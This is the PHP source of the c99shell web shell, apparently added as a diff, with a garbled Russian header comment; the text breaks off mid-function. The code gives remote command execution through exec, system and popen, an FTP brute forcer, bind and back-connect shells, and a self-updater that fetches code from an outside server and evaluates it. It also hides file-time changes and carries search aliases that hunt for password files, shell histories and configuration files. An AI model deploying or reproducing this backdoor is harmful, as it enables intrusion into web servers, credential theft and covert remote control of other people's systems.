أ¥أ²أ±أ؟/أ°أ أ±أ¯أ أھأ®أ¢أ»أ¢أ أ¥أ²أ±أ؟ أ·أ¥أ°أ¥أ§ tar) +* أ¯أ°أ®أ¤أ¢أ¨أ­أ³أ²أ»أ© أ¯أ®أ¨أ±أھ (أ¢أ®أ§أ¬أ®أ¦أ¥أ­ أ¢أ­أ³أ²أ°أ¨ أ´أ أ©أ«أ®أ¢) +* modify-time أ¨ access-time أ³ أ´أ أ©أ«أ®أ¢ أ­أ¥ أ¬أ¥أ­أ؟أ¾أ²أ±أ؟ أ¯أ°أ¨ أ°أ¥أ¤أ أھأ²أ¨أ°أ®أ¢أ أ­أ¨أ¨ (أ¤أ«أ؟ أ®أ²أھأ«. أ±أ¬ $filestealth) +* + أ¢أ»أ¯أ®أ«أ­أ¥أ­أ¨أ¥ أ¯أ°أ®أ¨أ§أ¢أ®أ«أ¼أ­أ®أ£أ® PHP-أھأ®أ¤أ  +* + أھأ®أ¤أ¨أ°أ®أ¢أ¹أ¨أھ أ¤أ أ­أ­أ»أµ أ·أ¥أ°أ¥أ§ md5, unix-md5, sha1, crc32, base64 +* + أ،أ»أ±أ²أ°أ»أ© أ«أ®أھأ أ«أ¼أ­أ»أ© أ أ­أ أ«أ¨أ§ أ،أ¥أ§أ®أ¯أ أ±أ­أ®أ±أ²أ¨ أژأ‘ +* + أ،أ»أ±أ²أ°أ®أ¥ ftp-أ±أھأ أ­أ¨أ°أ®أ¢أ أ­أ¨أ¥ أ­أ  أ±أ¢أ؟أ§أھأ¨ login;login أ¨أ§ /etc/passwd (أ®أ،أ»أ·أ­أ® أ¤أ أ¥أ² أ¤أ®أ±أ²أ³أ¯ أھ 1/100 أ أھأھأ أ³أ­أ²أ®أ¢) +* أ¯أ®أ±أ²أ°أ أ­أ¨أ·أ­أ»أ© أ¢أ»أ¢أ®أ¤, أ±أ®أ°أ²أ¨أ°أ®أ¢أھأ , أ£أ°أ³أ¯أ¯أ®أ¢أ»أ¥ أ®أ¯أ¥أ°أ أ¶أ¨أ¨ أ­أ أ¤ أپأ„/أ²أ أ،أ«أ¨أ¶أ أ¬أ¨, أ³أ¯أ°أ أ¢أ«أ¥أ­أ¨أ¥ أ¯أ°أ®أ¶أ¥أ±أ±أ أ¬أ¨ SQL) +* + أ±أھأ°أ¨أ¯أ² "أ«أ¾أ،أ¨أ²" include: أ أ¢أ²أ®أ¬أ أ²أ¨أ·أ¥أ±أھأ¨ أ¨أ¹أ¥أ² أ¯أ¥أ°أ¥أ¬أ¥أ­أ­أ»أ¥ أ± أ¤أ¥أ±أھأ°أ¨أ¯أ²أ®أ°أ أ¬أ¨ أ¨ أ¢أ±أ²أ أ¢أ«أ؟أ¥أ² أ¨أµ أ¢ أ±أ±أ»أ«أھأ¨ (أ®أ¯أ¶أ¨أ أ«أ¼أ­أ®) + أ²أ أھأ¦أ¥ أ¬أ®أ¦أ­أ® أ¨أ§أ¬أ¥أ­أ¨أ²أ¼ $surl (أ،أ أ§أ®أ¢أ أ؟ أ±أ±أ»أ«أھأ ) أھأ أھ أ·أ¥أ°أ¥أ§ أھأ®أ­أ´أ¨أ£أ³أ°أ أ¶أ¨أ¾ (أ¯أ°أ¨أ­أ³أ¤أ¨أ²أ¥أ«أ¼أ­أ®) أ²أ أھ أ¨ أ·أ¥أ°أ¥أ§ cookie "c99sh_surl", + أ¨أ¤أ¥أ² أ أ¢أ²أ®-أ§أ أ¯أ¨أ±أ¼ أ§أ­أ أ·أ¥أ­أ¨أ؟ $set_surl أ¢ cookie "set_surl" +* + أ¢أ®أ§أ¬أ®أ¦أ­أ®أ±أ²أ¼ "أ§أ أ،أ¨أ­أ¤أ¨أ²أ¼" /bin/bash أ­أ  أ®أ¯أ°أ¥أ¤أ¥أ«أ¥أ­أ­أ»أ© أ¯أ®أ°أ² أ± أ¯أ°أ®أ¨أ§أ¢أ®أ«أ¼أ­أ»أ¬ أ¯أ أ°أ®أ«أ¥أ¬, +* أ¨أ«أ¨ أ±أ¤أ¥أ«أ أ²أ¼ back connect (أ¯أ°أ®أ¨أ§أ¢أ®أ¤أ¨أ²أ±أ؟ أ²أ¥أ±أ²أ¨أ°أ®أ¢أ أ­أ¨أ¥ أ±أ®أ¥أ¤أ¥أ­أ¥أ­أ¨أ؟, أ¨ أ¢أ»أ¢أ®أ¤أ؟أ²أ±أ؟ أ¯أ أ°أ أ¬أ¥أ²أ°أ» أ¤أ«أ؟ أ§أ أ¯أ³أ±أھأ  NetCat). +* + أ¢أ®أ§أ¬أ®أ¦أ­أ®أ±أ²أ¼ أ،أ»أ±أ²أ°أ®أ£أ® أ±أ أ¬أ®-أ³أ¤أ أ«أ¥أ­أ¨أ؟ أ±أھأ°أ¨أ¯أ²أ  +* + أ أ¢أ²أ®أ¬أ أ²أ¨أ§أ¨أ°أ®أ¢أ أ­أ أ؟ أ®أ²أ¯أ°أ أ¢أھأ  أ±أ®أ®أ،أ¹أ¥أ­أ¨أ© أ® أ­أ¥أ¤أ®أ°أ أ،أ®أ²أھأ أµ أ¨ أ¯أ®أ¦أ¥أ«أ أ­أ¨أ؟أµ أ أ¢أ²أ®أ°أ³ (أ·أ¥أ°أ¥أ§ mail()) +* +* أڈأ°أ¨أ¢أ¥أ¤أ¥أ­ أ¤أ أ«أ¥أھأ® أ­أ¥ أ¯أ®أ«أ­أ»أ© أ±أ¯أ¨أ±أ®أھ أ¢أ®أ§أ¬أ®أ¦أ­أ®أ±أ²أ¥أ©. +* +* أژأ¦أ¨أ¤أ أ¥أ¬أ»أ¥ أ¨أ§أ¬أ¥أ­أ¥أ­أ¨أ؟: +* ~ أگأ أ§أ¢أ¨أ²أ¨أ¥ sql-أ¬أ¥أ­أ¥أ¤أ¦أ¥أ°أ  +* ~ أ„أ®أ،أ أ¢أ«أ¥أ­أ¨أ¥ أ­أ¥أ¤أ®أ±أ²أ أ¾أ¹أ¨أµ أ°أ أ±أ¸أ¨أ°أ¥أ­أ¨أ© أ´أ أ©أ«أ®أ¢ +* +* ~-~ أڈأ¨أ¸أ¨أ²أ¥ أ®أ،أ® أ¢أ±أ¥أµ أ­أ أ©أ¤أ¥أ­أ»أµ أ­أ¥أ¤أ®أ°أ أ،أ®أ²أھأ أµ, أ¦أ¥أ«أ أ¥أ¬أ»أµ أ¨أ§أ¬أ¥أ­أ¥أ­أ¨أ؟أµ أ¨ أ¤أ®أ°أ أ،أ®أ²أھأ أµ (أ¤أ أ¦أ¥ أ® أ±أ أ¬أ»أµ أ­أ¥أ§أ­أ أ·أ¨أ²أ¥أ«أ¼أ­أ»أµ!) + أ¢ ICQ UIN #656555 أ«أ¨أ،أ® أ·أ¥أ°أ¥أ§ أ°أ أ§أ¤أ¥أ« "feedback", أ،أ³أ¤أ³أ² أ°أ أ±أ±أ¬أ®أ²أ°أ¥أ­أ» أ¢أ±أ¥ أ¯أ°أ¥أ¤أ«أ®أ¦أ¥أ­أ¨أ؟ أ¨ أ¯أ®أ¦أ¥أ«أ أ­أ¨أ؟. +* +* Last modify: 29.07.2005 +* +* آ© Captain Crunch Security TeaM. Coded by tristram +* +****************************************************************************************************** +*/ +//Starting calls +if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}} +error_reporting(5); +@ignore_user_abort(true); +@set_magic_quotes_runtime(0); +$win = strtolower(substr(PHP_OS,0,3)) == "win"; +define("starttime",getmicrotime()); +if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} +$_REQUEST = array_merge($_COOKIE,$_GET,$_POST); +foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} + +$shver = "1.0 pre-release build #13"; //Current version +//CONFIGURATION AND SETTINGS +if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";} +elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);} +else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL +} + +$surl_autofill_include = true; //If true then search variables with descriptors (URLs) and save it in SURL. + +if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}} +if (empty($surl)) +{ + $surl = "?".$includestr; //Self url +} +$surl = htmlspecialchars($surl); + +$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited. + +//Authentication +$login = ""; //login +//DON'T FORGOT ABOUT PASSWORD!!! +$pass = ""; //password +$md5_pass = ""; //md5-cryped pass. if null, md5($pass) + +$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1") +$login_txt = "Restricted area"; //http-auth message. +$accessdeniedmess = "<a href=\"http://ccteam.ru/releases/c99shell\">c99shell v.".$shver."</a>: access denied"; + +$gzipencode = true; //Encode with gzip? + +$updatenow = false; //If true, update now (this variable will be false) + +$c99sh_updateurl = "http://ccteam.ru/update/c99shell/"; //Update server +$c99sh_sourcesurl = "http://ccteam.ru/files/c99sh_sources/"; //Sources-server + +$filestealth = true; //if true, don't change modify- and access-time + +$donated_html = "<center><b>Owned by hacker</b></center>"; + /* If you publish free shell and you wish + add link to your site or any other information, + put here your html. */ +$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html. + +$curdir = "./"; //start folder +//$curdir = getenv("DOCUMENT_ROOT"); +$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp) +$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...) + +$log_email = "user@host.tld"; //Default e-mail for sending logs + +$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending +$sort_save = true; //If true then save sorting-position using cookies. + +// Registered file-types. +// array( +// "{action1}"=>array("ext1","ext2","ext3",...), +// "{action2}"=>array("ext4","ext5","ext6",...), +// ... +// ) +$ftypes = array( + "html"=>array("html","htm","shtml"), + "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"), + "exe"=>array("sh","install","bat","cmd"), + "ini"=>array("ini","inf"), + "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"), + "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), + "sdb"=>array("sdb"), + "phpsess"=>array("sess"), + "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar") +); + +// Registered executable file-types. +// array( +// string "command{i}"=>array("ext1","ext2","ext3",...), +// ... +// ) +// {command}: %f% = filename +$exeftypes = array( + getenv("PHPRC")." -q %f%" => array("php","php3","php4"), + "perl %f%" => array("pl","cgi") +); + +/* Highlighted files. + array( + i=>array({regexp},{type},{opentag},{closetag},{break}) + ... + ) + string {regexp} - regular exp. + int {type}: + 0 - files and folders (as default), + 1 - files only, 2 - folders only + string {opentag} - open html-tag, e.g. "<b>" (default) + string {closetag} - close html-tag, e.g. "</b>" (default) + bool {break} - if true and found match then break +*/ +$regxp_highlight = array( + array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example + array("config.php",1) // example +); + +$safemode_diskettes = array("a"); // This variable for disabling diskett-errors. + // array (i=>{letter} ...); string {letter} - letter of a drive +//$safemode_diskettes = range("a","z"); +$hexdump_lines = 8; // lines in hex preview file +$hexdump_rows = 24; // 16, 24 or 32 bytes in one line + +$nixpwdperpage = 100; // Get first N lines from /etc/passwd + +$bindport_pass = "c99"; // default password for binding +$bindport_port = "31373"; // default port for binding +$bc_port = "31373"; // default port for back-connect +$datapipe_localport = "8081"; // default port for datapipe + +// Command-aliases +if (!$win) +{ + $cmdaliases = array( + array("-----------------------------------------------------------", "ls -la"), + array("find all suid files", "find / -type f -perm -04000 -ls"), + array("find suid files in current dir", "find . -type f -perm -04000 -ls"), + array("find all sgid files", "find / -type f -perm -02000 -ls"), + array("find sgid files in current dir", "find . -type f -perm -02000 -ls"), + array("find config.inc.php files", "find / -type f -name config.inc.php"), + array("find config* files", "find / -type f -name \"config*\""), + array("find config* files in current dir", "find . -type f -name \"config*\""), + array("find all writable folders and files", "find / -perm -2 -ls"), + array("find all writable folders and files in current dir", "find . -perm -2 -ls"), + array("find all service.pwd files", "find / -type f -name service.pwd"), + array("find service.pwd files in current dir", "find . -type f -name service.pwd"), + array("find all .htpasswd files", "find / -type f -name .htpasswd"), + array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"), + array("find all .bash_history files", "find / -type f -name .bash_history"), + array("find .bash_history files in current dir", "find . -type f -name .bash_history"), + array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"), + array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"), + array("list file attributes on a Linux second extended file system", "lsattr -va"), + array("show opened ports", "netstat -an | grep -i listen") + ); +} +else +{ + $cmdaliases = array( + array("-----------------------------------------------------------", "dir"), + array("show opened ports", "netstat -an") + ); +} + +$sess_cookie = "c99shvars"; // Cookie-variable name + +$usefsbuff = true; //Buffer-function +$copy_unset = false; //Remove copied files from buffer after pasting + +//Quick launch +$quicklaunch = array( + array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl), + array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"), + array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"), + array("<img src=\"".$surl."act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"), + array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""), + array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"), + array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"), + array("<b>Encoder</b>",$surl."act=encoder&d=%d"), + array("<b>Tools</b>",$surl."act=tools&d=%d"), + array("<b>Proc.</b>",$surl."act=processes&d=%d"), + array("<b>FTP brute</b>",$surl."act=ftpquickbrute&d=%d"), + array("<b>Sec.</b>",$surl."act=security&d=%d"), + array("<b>SQL</b>",$surl."act=sql&d=%d"), + array("<b>PHP-code</b>",$surl."act=eval&d=%d"), + array("<b>Update</b>",$surl."act=update&d=%d"), + array("<b>Feedback</b>",$surl."act=feedback&d=%d"), + array("<b>Self remove</b>",$surl."act=selfremove"), + array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()") +); + +//Highlight-code colors +$highlight_background = "#c0c0c0"; +$highlight_bg = "#FFFFFF"; +$highlight_comment = "#6A6A6A"; +$highlight_default = "#0000BB"; +$highlight_html = "#1300FF"; +$highlight_keyword = "#007700"; +$highlight_string = "#000000"; + +@$f = $_REQUEST["f"]; +@extract($_REQUEST["c99shcook"]); + +//END CONFIGURATION + + +// \/ Next code isn't for editing \/ +@set_time_limit(0); +$tmp = array(); +foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));} +$s = "!^(".implode("|",$tmp).")$!i"; +if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://ccteam.ru/releases/cc99shell\">c99shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");} +if (!empty($login)) +{ + if (empty($md5_pass)) {$md5_pass = md5($pass);} + if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) + { + if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));} + header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\""); + header("HTTP/1.0 401 Unauthorized"); + exit($accessdeniedmess); + } +} +if ($act != "img") +{ +$lastdir = realpath("."); +chdir($curdir); +if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;} +$sess_data = unserialize($_COOKIE["$sess_cookie"]); +if (!is_array($sess_data)) {$sess_data = array();} +if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} +if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} + +$disablefunc = @ini_get("disable_functions"); +if (!empty($disablefunc)) +{ + $disablefunc = str_replace(" ","",$disablefunc); + $disablefunc = explode(",",$disablefunc); +} + +if (!function_exists("c99_buff_prepare")) +{ +function c99_buff_prepare() +{ + global $sess_data; + global $act; + foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + $sess_data["copy"] = array_unique($sess_data["copy"]); + $sess_data["cut"] = array_unique($sess_data["cut"]); + sort($sess_data["copy"]); + sort($sess_data["cut"]); + if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}} + else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}} +} +} +c99_buff_prepare(); +if (!function_exists("c99_sess_put")) +{ +function c99_sess_put($data) +{ + global $sess_cookie; + global $sess_data; + c99_buff_prepare(); + $sess_data = $data; + $data = serialize($data); + setcookie($sess_cookie,$data); +} +} +foreach (array("sort","sql_sort") as $v) +{ + if (!empty($_GET[$v])) {$$v = $_GET[$v];} + if (!empty($_POST[$v])) {$$v = $_POST[$v];} +} +if ($sort_save) +{ + if (!empty($sort)) {setcookie("sort",$sort);} + if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);} +} +if (!function_exists("str2mini")) +{ +function str2mini($content,$len) +{ + if (strlen($content) > $len) + { + $len = ceil($len/2) - 2; + return substr($content, 0,$len)."...".substr($content,-$len); + } + else {return $content;} +} +} +if (!function_exists("view_size")) +{ +function view_size($size) +{ + if (!is_numeric($size)) {return false;} + else + { + if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} + elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} + elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} + else {$size = $size . " B";} + return $size; + } +} +} +if (!function_exists("fs_copy_dir")) +{ +function fs_copy_dir($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($o = readdir($h)) !== false) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + if (!$ret) {return $ret;} + } + } + closedir($h); + return true; +} +} +if (!function_exists("fs_copy_obj")) +{ +function fs_copy_obj($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (!is_dir(dirname($t))) {mkdir(dirname($t));} + if (is_dir($d)) + { + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + return fs_copy_dir($d,$t); + } + elseif (is_file($d)) {return copy($d,$t);} + else {return false;} +} +} +if (!function_exists("fs_move_dir")) +{ +function fs_move_dir($d,$t) +{ + $h = opendir($d); + if (!is_dir($t)) {mkdir($t);} + while (($o = readdir($h)) !== false) + { + if (($o != ".") and ($o != "..")) + { + $ret = true; + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = false;}} + if (!$ret) {return $ret;} + } + } + closedir($h); + return true; +} +} +if (!function_exists("fs_move_obj")) +{ +function fs_move_obj($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (is_dir($d)) + { + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + return fs_move_dir($d,$t); + } + elseif (is_file($d)) + { + if(copy($d,$t)) {return unlink($d);} + else {unlink($t); return false;} + } + else {return false;} +} +} +if (!function_exists("fs_rmdir")) +{ +function fs_rmdir($d) +{ + $h = opendir($d); + while (($o = readdir($h)) !== false) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d.$o)) {unlink($d.$o);} + else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} + } + } + closedir($h); + rmdir($d); + return !is_dir($d); +} +} +if (!function_exists("fs_rmobj")) +{ +function fs_rmobj($o) +{ + $o = str_replace("\\",DIRECTORY_SEPARATOR,$o); + if (is_dir($o)) + { + if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} + return fs_rmdir($o); + } + elseif (is_file($o)) {return unlink($o);} + else {return false;} +} +} +if (!function_exists("myshellexec")) +{ +function myshellexec($cmd) +{ + global $disablefunc; + $result = ""; + if (!empty($cmd)) + { + if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} + elseif (($result = `$cmd`) !== false) {} + elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_resource($fp = popen($cmd,"r"))) + { + $result = ""; + while(!feof($fp)) {$result .= fread($fp,1024);} + pclose($fp); + } + } + return $result; +} +} +if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}} +if (!function_exists("view_perms")) +{ +function view_perms($mode) +{ + if (($mode & 0xC000) === 0xC000) {$type = "s";} + elseif (($mode & 0x4000) === 0x4000) {$type = "d";} + elseif (($mode & 0xA000) === 0xA000) {$type = "l";} + elseif (($mode & 0x8000) === 0x8000) {$type = "-";} + elseif (($mode & 0x6000) === 0x6000) {$type = "b";} + elseif (($mode & 0x2000) === 0x2000) {$type = "c";} + elseif (($mode & 0x1000) === 0x1000) {$type = "p";} + else {$type = "?";} + + $owner["read"] = ($mode & 00400)?"r":"-"; + $owner["write"] = ($mode & 00200)?"w":"-"; + $owner["execute"] = ($mode & 00100)?"x":"-"; + $group["read"] = ($mode & 00040)?"r":"-"; + $group["write"] = ($mode & 00020)?"w":"-"; + $group["execute"] = ($mode & 00010)?"x":"-"; + $world["read"] = ($mode & 00004)?"r":"-"; + $world["write"] = ($mode & 00002)? "w":"-"; + $world["execute"] = ($mode & 00001)?"x":"-"; + + if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";} + if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";} + if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";} + + return $type.join("",$owner).join("",$group).join("",$world); +} +} +if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return false;}} +if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return false;}} +if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return false;}} +if (!function_exists("parse_perms")) +{ +function parse_perms($mode) +{ + if (($mode & 0xC000) === 0xC000) {$t = "s";} + elseif (($mode & 0x4000) === 0x4000) {$t = "d";} + elseif (($mode & 0xA000) === 0xA000) {$t = "l";} + elseif (($mode & 0x8000) === 0x8000) {$t = "-";} + elseif (($mode & 0x6000) === 0x6000) {$t = "b";} + elseif (($mode & 0x2000) === 0x2000) {$t = "c";} + elseif (($mode & 0x1000) === 0x1000) {$t = "p";} + else {$t = "?";} + $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; + $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; + $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; + return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w); +} +} +if (!function_exists("parsesort")) +{ +function parsesort($sort) +{ + $one = intval($sort); + $second = substr($sort,-1); + if ($second != "d") {$second = "a";} + return array($one,$second); +} +} +if (!function_exists("view_perms_color")) +{ +function view_perms_color($o) +{ + if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";} + elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";} + else {return "<font color=green>".view_perms(fileperms($o))."</font>";} +} +} +if (!function_exists("c99getsource")) +{ +function c99getsource($fn) +{ + global $c99sh_sourcesurl; + $array = array( + "c99sh_bindport.pl" => "c99sh_bindport_pl.txt", + "c99sh_bindport.c" => "c99sh_bindport_c.txt", + "c99sh_backconn.pl" => "c99sh_backconn_pl.txt", + "c99sh_backconn.c" => "c99sh_backconn_c.txt", + "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt", + "c99sh_datapipe.c" => "c99sh_datapipe_c.txt", + ); + $name = $array[$fn]; + if ($name) {return file_get_contents($c99sh_sourcesurl.$name);} + else {return false;} +} +} +if (!function_exists("c99sh_getupdate")) +{ +function c99sh_getupdate($update = true) +{ + $url = $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&"; + $data = @file_get_contents($url); + if (!$data) {return "Can't connect to update-server!";} + else + { + $data = ltrim($data); + $string = substr($data,3,ord($data{2})); + if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return false;} + if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";} + if ($data{0} == "\x99" and $data{1} == "\x03") + { + $string = explode("\x01",$string); + if ($update) + { + $confvars = array(); + $sourceurl = $string[0]; + $source = file_get_contents($sourceurl); + if (!$source) {return "Can't fetch update!";} + else + { + $fp = fopen(__FILE__,"w"); + if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c99shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";} + else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";} + } + } + else {return "New version are available: ".$string[1];} + } + elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;} + else {return "Error in protocol: segmentation failed! (".$data.") ";} + } +} +} +if (!function_exists("mysql_dump")) +{ +function mysql_dump($set) +{ + global $shver; + $sock = $set["sock"]; + $db = $set["db"]; + $print = $set["print"]; + $nl2br = $set["nl2br"]; + $file = $set["file"]; + $add_drop = $set["add_drop"]; + $tabs = $set["tabs"]; + $onlytabs = $set["onlytabs"]; + $ret = array(); + $ret["err"] = array(); + if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} + if (empty($db)) {$db = "db";} + if (empty($print)) {$print = 0;} + if (empty($nl2br)) {$nl2br = 0;} + if (empty($add_drop)) {$add_drop = true;} + if (empty($file)) + { + $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql"; + } + if (!is_array($tabs)) {$tabs = array();} + if (empty($add_drop)) {$add_drop = true;} + if (sizeof($tabs) == 0) + { + // retrive tables-list + $res = mysql_query("SHOW TABLES FROM ".$db, $sock); + if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} + } + $out = "# Dumped by C99Shell.SQL v. ".$shver." +# Home page: http://ccteam.ru +# +# Host settings: +# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"." +# Date: ".date("d.m.Y H:i:s")." +# DB: \"".$db."\" +#--------------------------------------------------------- +"; + $c = count($onlytabs); + foreach($tabs as $tab) + { + if ((in_array($tab,$onlytabs)) or (!$c)) + { + if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} + // recieve query for create table structure + $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); + if (!$res) {$ret["err"][] = mysql_smarterror();} + else + { + $row = mysql_fetch_row($res); + $out .= $row["1"].";\n\n"; + // recieve table variables + $res = 